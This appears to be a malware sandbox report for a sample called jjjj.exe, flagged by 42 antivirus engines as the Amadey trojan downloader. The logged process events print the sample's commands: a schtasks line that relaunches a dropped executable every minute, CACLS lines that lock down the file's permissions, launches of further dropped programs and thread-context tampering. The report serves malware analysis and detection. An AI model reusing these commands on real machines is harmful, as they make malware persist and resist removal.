NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 2112	1	0
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2208 thread_handle: 0x00000264 process_identifier: 2204 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN npsvga64.exe /TR "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000026c	1	1
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2268 thread_handle: 0x000001c8 process_identifier: 2264 current_directory: C:\Users\test22\AppData\Local\Temp\6bb5824ec4 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "npsvga64.exe" /P "test22:N"&&CACLS "npsvga64.exe" /P "test22:R" /E&&echo Y\|CACLS "..\6bb5824ec4" /P "test22:N"&&CACLS "..\6bb5824ec4" /P "test22:R" /E&&Exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000268	1	1
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2664 thread_handle: 0x000003e8 process_identifier: 2660 current_directory: C:\Users\test22\AppData\Local\Temp\6bb5824ec4 filepath: C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe" filepath_r: C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000414	1	1
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2856 thread_handle: 0x00000378 process_identifier: 2852 current_directory: C:\Users\test22\AppData\Local\Temp\6bb5824ec4 filepath: C:\Users\test22\AppData\Roaming\1000223050\tcpupdate.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\1000223050\tcpupdate.exe" filepath_r: C:\Users\test22\AppData\Roaming\1000223050\tcpupdate.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000414	1	1
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2344 thread_handle: 0x0000008c process_identifier: 2340 current_directory: C:\Users\test22\AppData\Local\Temp\6bb5824ec4 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2384 thread_handle: 0x00000088 process_identifier: 2380 current_directory: C:\Users\test22\AppData\Local\Temp\6bb5824ec4 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "npsvga64.exe" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2436 thread_handle: 0x0000008c process_identifier: 2432 current_directory: C:\Users\test22\AppData\Local\Temp\6bb5824ec4 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "npsvga64.exe" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2484 thread_handle: 0x0000008c process_identifier: 2480 current_directory: C:\Users\test22\AppData\Local\Temp\6bb5824ec4 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2520 thread_handle: 0x00000094 process_identifier: 2516 current_directory: C:\Users\test22\AppData\Local\Temp\6bb5824ec4 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\6bb5824ec4" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2576 thread_handle: 0x0000008c process_identifier: 2572 current_directory: C:\Users\test22\AppData\Local\Temp\6bb5824ec4 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\6bb5824ec4" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 2380	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x0000009c suspend_count: 1 process_identifier: 2432	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 2516	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2572	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000001c4 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x00000234 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000003bc suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000003e4 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x00000434 suspend_count: 1 process_identifier: 2660	1	0
NtGetContextThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000000e4	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:46 p.m.	thread_handle: 0x00000434 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000003a4 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 2660	1	0
NtGetContextThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4	1	0
NtSetContextThread May 31, 2023, 5:47 p.m.	registers.eip: 1928735620 registers.esp: 4383180 registers.edi: 108 registers.eax: 42076520 registers.ebp: 4383352 registers.edx: 1 registers.ebx: -110 registers.esi: 4 registers.ecx: 42076404 thread_handle: 0x000000e4 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000003e8 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 2660	1	0
NtGetContextThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4	1	0
NtSetContextThread May 31, 2023, 5:47 p.m.	registers.eip: 1928735620 registers.esp: 4383180 registers.edi: 108 registers.eax: -107 registers.ebp: 4383352 registers.edx: 1 registers.ebx: -110 registers.esi: 113 registers.ecx: 42067120 thread_handle: 0x000000e4 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x00000274 suspend_count: 1 process_identifier: 2660	1	0
NtResumeThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000003e4 suspend_count: 1 process_identifier: 2660	1	0
NtGetContextThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread May 31, 2023, 5:47 p.m.	thread_handle: 0x000000e4	1	0
NtSetContextThread May 31, 2023, 5:47 p.m.	registers.eip: 1928735620 registers.esp: 4384496 registers.edi: 135 registers.eax: 42067040 registers.ebp: 4384760 registers.edx: -129 registers.ebx: 134 registers.esi: 142 registers.ecx: 0 thread_handle: 0x000000e4 process_identifier: 2660	1	0

File has been identified by 42 AntiVirus engines on VirusTotal as malicious (42 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Deyma.4!c
MicroWorld-eScan	Trojan.GenericKD.67305705
FireEye	Generic.mg.7338191364d7eb9a
McAfee	Artemis!7338191364D7
Malwarebytes	Malware.AI.3869844464
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
BitDefenderTheta	Gen:NN.ZexaE.36250.@J0@aOIXXJai
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/TrojanDownloader.Amadey.F
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	Trojan-Downloader.Win32.Deyma.djz
BitDefender	Trojan.GenericKD.67305705
Avast	Win32:Evo-gen [Trj]
Sophos	Mal/Generic-S
F-Secure	Trojan.TR/Redcap.jsbjm
TrendMicro	Trojan.Win32.AMADEY.YXDE4Z
McAfee-GW-Edition	BehavesLike.Win32.Generic.rc
Trapmine	malicious.high.ml.score
Emsisoft	Trojan.GenericKD.67305705 (B)
SentinelOne	Static AI - Suspicious PE
Webroot	W32.Deyma.djz
Avira	TR/Redcap.jsbjm
MAX	malware (ai score=83)
Antiy-AVL	Trojan[Downloader]/Win32.Amadey
Gridinsoft	Trojan.Win32.Amadey.bot
Microsoft	Trojan:Script/Phonzy.B!ml
ZoneAlarm	Trojan-Downloader.Win32.Deyma.djz
GData	Win32.Trojan.Agent.YZWSQB
Google	Detected
AhnLab-V3	Trojan/Win.Generic.C4535752
Cylance	unsafe
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	Trojan.Win32.AMADEY.YXDE4Z
Rising	Downloader.Deyma!8.1093B (TFE:5:asFuDuwBclK)
Ikarus	Trojan-Downloader.Win32.Amadey
Fortinet	PossibleThreat.PALLAS.H
AVG	Win32:Evo-gen [Trj]
DeepInstinct	MALICIOUS

jjjj.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All